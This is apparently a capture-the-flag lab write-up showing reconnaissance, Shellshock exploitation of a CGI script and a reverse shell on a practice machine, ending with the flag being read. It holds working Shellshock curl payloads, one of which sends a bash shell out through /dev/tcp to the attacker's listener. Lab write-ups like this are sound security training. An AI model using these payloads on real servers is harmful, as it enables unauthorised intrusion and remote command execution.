┌──(kali㉿GNOME)-[~]
└─$ rustscan -a 192.168.76.87
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
┌──(kali㉿GNOME)-[~]
└─$ nmap -sC -sV 192.168.76.87 -p 22,80,
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It has nothing, so we try to Fuzzy Duck it
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u <http://192.168.76.87/> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 290]
/.hta (Status: 403) [Size: 285]
/cgi-bin/ (Status: 403) [Size: 289]
/index (Status: 200) [Size: 177]
/index.html (Status: 200) [Size: 177]
/server-status (Status: 403) [Size: 294]
We can see there is a /cgi-bin there, let’s ducky fuzz it again
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u <http://192.168.76.87/cgi-bin/> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 298]
/.hta (Status: 403) [Size: 293]
/test (Status: 200) [Size: 14]
While doing manual scan, my Nikto auto scan is completed
┌──(kali㉿GNOME)-[~]
└─$ nikto -h 192.168.76.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.76.87
+ Target Hostname: 192.168.76.87
+ Target Port: 80
+ Start Time: 2022-06-21 18:11:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Tue May 12 01:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See <http://www.wisec.it/sectou.php?id=4698ebdc59d15>. The following alternatives for 'index' were found: index.html
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS.
From the Nikto we can see that Site appears vulnerable to the 'shellshock' vulnerability
From this https://www.sevenlayers.com/index.php/blog/340-vulnhub-sumo-1-walkthrough writeup I found this command which can directly inject command to the vulnerable shellshock server
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" <http://192.168.76.87/cgi-bin/test/test.cgi>
┌──(kali㉿GNOME)-[~]
└─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" <http://192.168.76.87/cgi-bin/test/test.cgi>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now we can do the reverse shell!
┌──(kali㉿GNOME)-[~]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.49.76/1234 0>&1' <http://192.168.76.87/cgi-bin/test/test.cgi>
┌──(kali㉿GNOME)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.76] from (UNKNOWN) [192.168.76.87] 42516
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
www-data
www-data@ubuntu:/usr/lib/cgi-bin$ cat local.txt
31b8f9af83414d6cc25a31aa896eaf8e